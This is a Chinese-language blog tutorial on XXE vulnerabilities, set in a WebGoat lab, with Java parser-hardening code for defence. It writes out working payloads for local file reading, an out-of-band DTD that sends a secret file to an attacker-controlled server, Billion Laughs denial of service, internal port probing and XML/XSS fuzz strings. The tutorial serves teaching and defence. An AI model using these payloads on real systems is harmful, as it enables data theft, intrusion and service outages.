Web安全--XXE

最新推荐文章于 2024-02-18 17:14:27 发布
最新推荐文章于 2024-02-18 17:14:27 发布
阅读量837 收藏 2
点赞数
分类专栏: web安全 文章标签: XXE 漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lanyef/article/details/49073693
版权

0x01 简介

 

顺手搜了一下CVE,XXE的问题还真不少。

XXE,XML External Entity (外部实体)。

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。它使用一系列的合法元素来定义文档结构。

一般实体(General Entities)

可在xml中进行引用,&js;

 

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY js "Jo Smith">  // js 为dtd中声明的内部实体
]>
<author>&js;</author>  // 通过&js;进行引用

外部实体(External Entities)

可获取外部资源(非xml中声明的),可用于一般实体、参数实体

 

<?xml version="1.0" encoding="utf-8"?>
// DTD 定义,root为声明的外部实体
<!DOCTYPE user [
    <!ENTITY root SYSTEM "file:///c:\"> 
]> 
<comment> 
  <text>&root;Hello</text>  //&root;引用
</comment>
​
// 也可以是使用PUBLIC关键字进行定义,读取公共资源
<!ENTITY name PUBLIC "any_text" "URI/URL">

外部是实体支持http、file等协议,具体如下:

 

参数实体(Parameter entities)

可在doctype声明中使用,也可以在实体定义value 中使用


<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.3.112:9090/WebWolf/files/attack.dtd">
%remote;
]>
<comment>
  <text>test&ping;</text>
</comment>
​
// 其他如:
<!ENTITY % name "Hello World">
<!ENTITY % name "Hello %myEntity;">

说完实体的概念,基本就能看清楚漏洞的原理了,通过外部实体(http、ftp)获取信息。

0x02 漏洞危害

读取任意文件

因为外部实体支持ftp协议,可以构造payload获取目录、文件信息。

具体可参考webgoat8 xxe stage 3,利用也比较简单。

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE user [<!ENTITY root SYSTEM "file:///c:\"> ]>
<comment> 
  <text>&root;xxe</text>
</comment>

如果没有回显,通过Bland XXE(OOB)进行利用,具体参考webgoat8 xxe stage 7

搭一个服务器(A)接收http请求发送的数据,A服务器定义attack.dtd

目标机解析包含payload的xml,外部实体读取attack.dtd,然后发送数据至获取数据。

attack.dtd

 

<?xml version="1.0" encoding="UTF-8"?>
// 参数实体、外部实体,读取目标机文件
<!ENTITY % file SYSTEM "file:///c:/Users/derek/.webgoat-8.0.0.M24/XXE/secret.txt"> 
// 参数实体,实体内定义外部实体访问A服务器并发送读取的内容
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.3.103:9091/landing?text=%file;'>">
%all;

payload:

 

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://192.168.3.103:9091/files/admin1/attack2.dtd">
%remote;
]>
<comment>
  <text>test123---&send;</text>
</comment>

DOS攻击

通过构造恶意实体,指数级生成超大xml文档,服务器在解析时好景资源,导致DOS。此示例及著名的Billion laughs attack

payload:

 

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

内网探测

因为外部实体支持ftp、http等协议,所以可利用进行内网探测(服务器、端口),甚至进行账号、密码爆破。

服务器、端口探测

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE user [<!ENTITY root SYSTEM "http://192.168.3.103:9090/index.html"> ]>
<comment> 
  <text>&root;xxe</text>
</comment>

用webgoat8 xxe 的例子试一下,把webwolf当成内网机器。

 

左边是可访问地址,返回解析错误。

 

"javax.xml.bind.UnmarshalException\\n - with linked exception:
\\n[javax.xml.stream.XMLStreamException: 
    ParseError at [row,col]:[4,15]
\\nMessage: http:\\/\\/192.168.3.103:9091\\/WebGoat]\\r\\n\\tat com.sun.xml.bind.v2.runtime.unmarshaller.UnmarshallerImpl.handleStreamEx

右边端口未开放,拒绝连接,且响应时间明显会长一些。

 

"javax.xml.bind.UnmarshalException\\n - with linked exception:
\\n[javax.xml.stream.XMLStreamException:
ParseError at [row,col]:[4,15]\\nMessage: Connection refused: connect

远程代码执行(RCE)

针对PHP环境中安装expect扩展,通过返回报错信息、返回时间等进行判断。

payload如下,具体示例懒得搭环境了。

 

 <?xml version="1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY test SYSTEM "http://ip:80/tets.txt">
    ]>
    <abc>&test;</abc>

 

0x03 漏洞检测

黑盒

  • 看到xml传输数据,必须试一把xxe;
  • 对于一些json传输,修改content-type,是否可注入xml;
  • 使用xml标签进行闭合,是否可打到篡改目的;
  • 单引号、双引号、注释、地址符、外部实体引用

 

‘    "    &  < >  ]]>
<!-- 
<![CDATA[ / ]]> -    
<![CDATA[<]]>script<![CDATA[>]]>alert(‘xss’)<![CDATA[<]]>/
script<![CDATA[>]]>
<!ENTITY test SYSTEM "http://ip:80/tets.txt">
  • XML Injection Fuzz Strings   fuze工具
https:/wfuzz.googlecode.com/svn/trunk/wordlist/Injections/ XML.txt

白盒

审计源码,查看XML处理是否禁用实体,常用的xml解析类如下:

  • DOM: import javax.xml.parsers.DocumentBuilder/DocumentBuilderFactory
  • Dom4j: import org.dom4j.io.SAXReader
  • JDOM:    import org.jdom2.input.SAXBuilder
  • SAX:   import javax.xml.parsers.SAXParser/SAXParserFactory
  • JAXB: import javax.xml.bind.Unmarshaller
  • StAX: import javax.xml.paresers.SAXPareserFactory / javax.xml.stream.XMLStreamReader
  • javax.xml.transform.TransformerFactory

除了上方列出xml解析器,一些存在XXE的常用第三方组件:

  • Spring OXM & Spring MVC(3.0.0 - 3.2.3)
  • Spring OXM (4.0.0.M1)
  • Spring MVC (4.0.0.M1-4.0.0.M2)
  • Apache POI  (3.11以下,excel解析)

0x04 防御

防御的话,最好直接禁用DTD;

如果有需要使用DTD,禁用外部实体;

对用户输入进行必要的验证及过滤;

  • DocumentBuilderFactory

 

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
String FEATURE = null;
try {
​
    FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
    dbf.setFeature(FEATURE, true);
    FEATURE = "http://xml.org/sax/features/external-general-entities";
    dbf.setFeature(FEATURE, false);
    FEATURE = "http://xml.org/sax/features/external-parameter-entities";
    dbf.setFeature(FEATURE, false);
    FEATURE = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
    dbf.setFeature(FEATURE, false);
​
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
​
    ...
} catch (XXXException e) {
    ...
}
  • XMLInputFactory

 

 

// This disables DTDs entirely for that factory
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); 
// disable external entities
xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

 

  • XMLReader

 

XMLReader reader = XMLReaderFactory.createXMLReader();
reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.
reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 
reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXReader

 

saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXBuilder

 

SAXBuilder builder = new SAXBuilder();
builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Document doc = builder.build(new File(fileName));
  • Ummarshaller

 

//Disable XXE
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
​
//Do unmarshall operation
Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), 
                                new InputSource(new StringReader(xml)));
JAXBContext jc = JAXBContext.newInstance(Object.class);
Unmarshaller um = jc.createUnmarshaller();
um.unmarshal(xmlSource);

参考:

https://www.freebuf.com/articles/web/177979.html

https://www.freebuf.com/column/181064.html

https://www.freebuf.com/vuls/176837.html

https://www.freebuf.com/vuls/194112.html

https://xz.aliyun.com/t/2571

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_Security_Cheat_Sheet.md

 

 

 

 

 

 

小智若愚安全路
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
XML External Entities 攻击(XML外部实体注入)
weixin_45352161的博客
05-17 3497
使用配置的 XML 解析器无法预防和限制外部实体进行解析,这会使解析器暴露在 XML External Entities 攻击 之下 说明: XML External Entities 攻击可利用能够在处理时动态构建文档的 XML 功能。XML 实体可动态包含来自给定资 源的数据。外部实体允许 XML 文档包含来自外部 URI 的数据。除非另行配置,否则外部实体会迫使 XML 解 析器访问由 URI 指定的资源,例如位于本地计算机或远程系统上的某个文件。这一行为会将应用程序暴露给 XM
关于xml实体攻击的讨论
tlxamulet的博客
02-12 797
xml实体攻击
7z apache解析漏洞_XXE 漏洞代码及修复代码整理
weixin_27034523的博客
12-23 783
XML原理XXE:XML External Entity 即XML外部实体注入攻击。是由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体,通过外部实体SYSTEM请求本地文件uri,通过某种方式返回本地的文件内容,导致了XXE漏洞。java中出现的场景poc.xml<?xml version="1.0" encoding="ISO-8859-1" ?> &lt...
DOM解析之DOM防护-XXE(外部实体注入漏洞)
就写一行代码
11-20 1240
最新的项目被微信告知一个漏洞需要解决,说是“XML外部实体注入漏洞” 也就是说 涉及微信回调解析xml的过程需要补充一个防止外部实体注入的代码,以下以DOM为例。 具体代码如下: 这个是一个公共的方法 用来解析之前加入xml防护 package com.net.pay.wxpay.util; import java.io.IOException; import javax.xml...
mybatis报-因为 accessExternalDTD 属性设置的限制导致不允许 http 访问
javaThinker的专栏
11-29 8320
外部 DTD: 无法读取外部 DTD 'mybatis-3-config.dtd', 因为 accessExternalDTD 属性设置的限制导致不允许 'http' 访问。 Exception in thread "main" org.apache.ibatis.exceptions.PersistenceException: ### Error building SqlSession. ...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
例如,禁用`LIBXML_NOENT`选项,使用安全的XML解析库,或在WAF(Web Application Firewall)中添加相应的防护规则。 **六、XXE靶场实践** 在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1...
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
信息安全_xxe注入应用与拓展.pptx
08-14
2. **基于SOAP的Web Service**:SOAP(Simple Object Access Protocol)是一种基于XML的通信协议,若其处理XML输入时未进行安全验证,也可能成为XXE的入口。 3. **开发框架的Content-Type智能识别**:例如SpringMVC...
WEB安全XXE实体注入漏洞.pdf
12-12
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储...总之,理解和防范XXE漏洞对于维护Web应用的安全至关重要。开发人员应确保正确处理XML输入,限制XML解析器的功能,并时刻关注最新的安全最佳实践。
web安全原理分析】-XEE漏洞入门
Dasdwer的博客
04-04 643
XXE漏洞XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。XML基础XMLXML(EXtensible Markup Language,可扩展标记语言)用来结构化、存储以及传输信息。
XEE漏洞任意文件读取
m0_58001548的博客
04-30 1887
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。通过 XML实体,"SYSTEM”关键词导致XML解析器可以从本地文件或者远程URI中读取数据。所以攻击者可以通过XML实体传递自己构造的恶意值,使处理程序解析它。当引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XML指可扩展标记语言(Extensible Markup Language)XML是一种标记语言,很类似HTML。
XEE漏洞学习(史上最详细 包括Linux配置漏洞环境)
qq_34598847的博客
10-13 761
XXE漏洞全称XML External Entity Injection 即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害
web安全--Xml外部实体注入漏洞(XXE)与防护
fabao007的专栏
05-02 1365
Xml外部实体注入(XXE) 除了json外,xml也是一种常用的数据传输格式。对xml的解析有以下几种常用的方式:DOM,SAX,JDOM,DOM4J,StAX等。然而这几种解析方式都可能会出现外部实体注入漏洞,如微信支付的回调就出现过(见参考资料2)。 XML文档结构包括xml声明,DTD文档类型定义(可选)和文档元素,如下图所示: DTD的作用是定义XML文档的合法构建模块,可以...
XEE漏洞详解(全面)
最新发布
m0_64481831的博客
02-18 1194
XML是一种标记语言,用于描述数据的结构和内容。它可以用来表示各种类型的数据,例如文本、数字、图像等。XML设计的目的是为了使数据的交换和共享更加容易,同时也可以被用于数据的存储和传输。用途:异步系统之间进行数据传输的媒介(现在json代替了该功能)例如如果想要Java程序和Python程序之间进行数据传输,就可以使用xml作为存放数据的载体,以此传输。作为配置文件使用配置文件是用于给应用程序提供配置参数以及初始化设置的一些文件。xml文档声明,在文档的第一行,包括xml版本号和字符集声明。
XEE漏洞基础以及进阶
W_seventeen的博客
02-28 1781
XML编程基础 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 ###XML标签根据自己主观定义,不像HTML是被预定义好的 <note> <to&...
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 5495
该篇描述Web漏洞-XXE漏洞(详细)
WebGoat8 M17 XXE 全思路、题解与答案
伊维泽诺流浪记
02-27 1988
目录 01 什么是XML语言 02 实体、外部实体 03 什么是XXE 04 XXE问题3 ★ 05 XXE问题4 ★ 06 参数实体 07 XXE问题7 ★ 01 什么是XML语言 XML(EXtensible Markup Language),可扩展标记语言,是一种用于标记电子文件,使其具有结构性的标记语言,可以用来标记数据,定义数据类型。与HTML不同:HTML被设计...
WebGoat攻略 for Mac(4)
qq_42955000的博客
04-19 235
WebGoat攻略 for Mac(1) WebGoat攻略 for Mac(4)一、题目攻略A3.Sensitive Data Exposure(敏感数据暴露)1.Insecure Login(不安全登录)A4. XML External Entities (XXE)(XML外部实体)1.XXE 一、题目攻略 A3.Sensitive Data Exposure(敏感数据暴露) 1.Insecure Login(不安全登录) 让我们试试 任务是尝试使用数据包嗅探器拦截请求。 点击Log in,然后抓
Web安全深度解析:攻防技术与实践
"Web安全学习笔记-Web-Sec Documentation 是一份详尽的Web安全知识库,涵盖从基础知识到深入攻防策略的多个方面。作者Lyle在2021年9月25日发布了该文档的1.0版本。这份文档主要分为七个部分,包括序章、计算机网络与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值